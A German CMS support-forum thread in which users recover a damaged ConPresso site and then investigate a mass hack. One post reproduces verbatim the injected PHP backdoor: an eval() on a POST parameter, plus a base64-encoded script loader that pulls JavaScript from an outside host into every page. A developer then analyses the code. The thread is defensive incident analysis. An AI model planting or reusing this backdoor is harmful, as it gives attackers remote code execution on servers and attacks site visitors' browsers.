Content nicht mehr verfügbar

Fragen und Diskussionen zu laufenden ConPresso 4.x Projekten werden in diesem Forum diskutiert.
TiffD
ConPresso-Newbie
Beiträge: 8
Registriert: 01.04.2009 16:33

Beitrag von TiffD »

Juhuu, Du bist mein Held, das cpo4 hats gerichtet ;-))))))))))

So, jetzt ist alles da!!!

Daß die ganzen Bilder fehlen, liegt daran, daß Conpresso noch die ganzen Dateien fehlen, die im Ordner _data lagen, oder? Die kann ich doch jetzt einfach wieder in den Ordner hochladen, oder?

Ich freue mich so sehr!!!
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Genau... einfach wieder alles nach _data kopieren.
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Und dann mache Dich ein wenig intensiver mit dem Thema Backup vertraut.

Denn der Provider hat "nie" was gemacht... was aber eigentlich sein Job ist für den er Geld bekommt...
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Ich würde auch ganz dringend Euer Forum entsorgen.

Außer Spammern schreibt da wohl niemand? Und moderiert wird es seit 2007 auch nicht mehr, oder? Das ist schon aus rechtlichen Gründen keine gute Idee... :?
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
TiffD
ConPresso-Newbie
Beiträge: 8
Registriert: 01.04.2009 16:33

Beitrag von TiffD »

Guter Tipp, ich habe soeben alle Einträge im Forum gelöscht. Das hatte
ich irgendwie gar nicht mehr beachtet.

Prima, jetzt läuft ja wieder alles. Einzig die Bilder sehen komisch aus. Naja, wir arbeiten ohnehin an einer neuen Seite, da ist das nicht so tragisch.

Vielen vielen Dank für Deine Hilfe, ich bin wirklich sehr froh!

Tiffany
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Jetzt noch ein Nachtrag:

Wahrscheinlich wurde Dein Server (bzw. der von 1&1) gehackt!

Einem meiner Kunden ist nun das Gleiche passiert.
Es tauchten genau die gleichen Meldungen auf und es zeigte sich, daß alle index-Dateien sowie Einstellungs- und Konfigurationsdateien verändert wurden und in die erste Zeile der folgende Code eingeschleust wurde:

Code: Alles auswählen

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdQdzIlM0NzY3JpTEhYcFB3MnRSMmwlMjBtS1hzdWpyNE5jbUtYJTNEZ1IlMkY0TiUyRjk0JTJFMjRSMmw3Z1IlMkUyZ1IlMkUxNE45TEhYNWhtJTJGaG1qTEhYcXVSMmxlZ1JyZ1J5JTJFanNtS1glM0UlM0MlMkZQdzJzZ1JjcmlobXB0TEhYJTNFJykucmVwbGFjZSgvaG18NE58UHcyfGdSfG1LWHx1anxMSFh8UjJsL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
Ich habe jetzt alle betroffenen Dateien (einfach am Datum zu erkennen) ersetzt.

Ein ähnlicher Code wurde in alle .js-Dateien sowie in alle .html-Dateien zwischen head und body-Tag eingeschleust!

Verändert wurden insbesondere ALLE Dateien, die das Wort "index" im Dateinamen tragen, außerdem alle "settings.php". Außerdem im Verzeichnis _include die Dateien sessiondb.inc.php, insertdb_fields.inc.php, db_mysql.inc.php und constants.inc.php. Außerdem die _cfg/db.inc.php

Offensichtlich sind index, db, ggf. session, settings und constant die Schlüsselwörter.

Wer bei 1&1 ist und noch kein Backup gemacht hat sollte es jetzt vielleicht mal machen... :wink:
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
Mr. Magpie
ConPresso-Profi
Beiträge: 1004
Registriert: 01.01.1970 01:00
Wohnort: Wuppertal
Hat sich bedankt: 274 Mal
Danksagung erhalten: 59 Mal

Beitrag von Mr. Magpie »

Hallo Markus,

gibt es denn irgendwelche Anzeichen, wie der Angreifer die Dateien ersetzen konnte?
Günther Ludwig
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Nein, gibt es nicht.

Aber es gibt in einigen Foren Beiträge zu gehackten Servern, bei denen dieser Code ebenfalls eingeschleust wurde. Und das sind keine ConPresso- sondern Forensysteme gewesen.

Erstaunlich ist dabei natürlich, daß jemand einen Server hackt und erfolgreich Code einschleust, dann aber bei diesem Code die PHP-Syntax versaut... :lol:
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
balu
ConPresso-Entwickler
Beiträge: 1748
Registriert: 01.01.1970 01:00
Hat sich bedankt: 81 Mal
Danksagung erhalten: 133 Mal

Beitrag von balu »

Hi zusammen,

ich habe mir den Code mal angeschaut.

Man kann dort durch Angabe von tmp_lkojfghx3 als Parameter in der URL beliebigen PHP-Code ausführen, weil dieser durch eval() geleitet wird.

Ausserdem wird zu Anfang mit base64_decode() ein Javascript ausgegeben.

Das Javascript lädt eine Javascript-Datei aus Lettland nach, die das Parsen von HTML-Dokumenten erleichtert (eine Standard-Library von http://jquery.com/), die aber um zusätzlichen Code erweitert wurde.

Dann kommt noch eine PHP-Funktion, die ich nicht genauer analysiert habe, weil da zu viele Regex-Ausdrücke usw. sind. Dafür fehlt mir im Moment die Zeit.

Jedenfalls scheint es dort verschiedene Methoden zu geben, Inhalt in die Seite einzufügen. Es werden dort wohl unter anderem script-Tags benutzt und der body ersetzt.

Grundsätzlich sieht das nach einem Massenhack aus, der Inhalte in die Seite einfügt und dann versucht die Rechner der Besucher über den Browser zu hacken.

Google findet jedenfalls massenhaft Links zu tmp_lkojfghx...

Balu
Bartels.Schöne
ConPresso Support & Development
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Nochmal der Vollständigkeit halber:

vor 3 Stunden wurde ein weiterer ConPresso-Auftritt gehackt!

Diesmal aber ohne Fehlermeldungen, also kaum erkennbar (wenn der Browser keine Sicherheitswarnungen ausgibt). Hosting auf einem Strato-Low-Cost-Hosting.

Auch hier das gleiche und wieder bezogen auf wenig ConPresso-typische Dateien.
Scheint also weniger ein ConPresso als ein allgemeines Problem zu sein.

Daher nochmal der Hinweis:
Wer keine aktuelle Datensicherung hat sollte sie JETZT anfertigen!

Wenn ich eine Verdacht äußern soll, dann tippe ich auf den FTP-Server des Hosters, weil genau bei diesen Webauftritten ständig FTP-Abbrüche zu verzeichnen sind...
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
MarkusR
Handbuchversteher
Beiträge: 7362
Registriert: 01.01.1970 01:00
Hat sich bedankt: 111 Mal
Danksagung erhalten: 934 Mal
Kontaktdaten:

Beitrag von MarkusR »

Und noch eine weitere Info:

Der Dateiaustausch findet ganz einfach per FTP statt.

Dabei werden die Verzeichnisse automatisiert abgerufen, die entsprechenden Dateien indentifiziert, modifiziert und gleich wieder hochgeladen.

In einem der Fälle über eine irische IP und innerhalb von 3 Minuten.

Anbei mal das FTP-Log, bei dem ich den echten FTP-Usernamen durch "FTP-User" ersetzt habe.
Die Zeilen, die ein "STOR" enthalten zeigen deutlich, welche Dateien ausgetauscht wurden.
Dateianhänge
ftp.log.hack.txt
(203.46 KiB) 304-mal heruntergeladen
Ciao Markus
ConPresso-Module

Kein Support per PN!!! Für Fragen und Diskussionen ist das Forum da!

Succi recentis officinalis
Hochwertige Kräutersäfte und -Öle
Benutzeravatar
balu
ConPresso-Entwickler
Beiträge: 1748
Registriert: 01.01.1970 01:00
Hat sich bedankt: 81 Mal
Danksagung erhalten: 133 Mal

Beitrag von balu »

Hi Markus,

danke für die weiteren Infos.

Die Frage ist jetzt, woher hat der Hacker die Zugangsdaten für FTP?

Per Web einzubrechen ist einfach, wenn es ungepatchte Probleme in PHP-Scripten gibt. Aber an die Zugangsdaten für FTP zu kommen, ist schon einiges mehr an Aufwand.

Balu
Bartels.Schöne
ConPresso Support & Development
Benutzeravatar
balu
ConPresso-Entwickler
Beiträge: 1748
Registriert: 01.01.1970 01:00
Hat sich bedankt: 81 Mal
Danksagung erhalten: 133 Mal

Beitrag von balu »

Hi,

nachdem ich im Netz noch zumindest einen anderen Hack von derselben IP gefunden hatte, habe ich die Abuse-Abteilung des Betreibers in Irland kontaktiert.
Hi Thomas,

Thank you for the report. That is a shared webserver and our engineers are trying to find out the source of the attack. In the meantime we have stopped outbound connections via FTP

Regards,
Tara.
---
Ms Tara Callinan
Technical Support Supervisor
Vermutlich wurde der Server auch gehackt.

Balu
Bartels.Schöne
ConPresso Support & Development
Antworten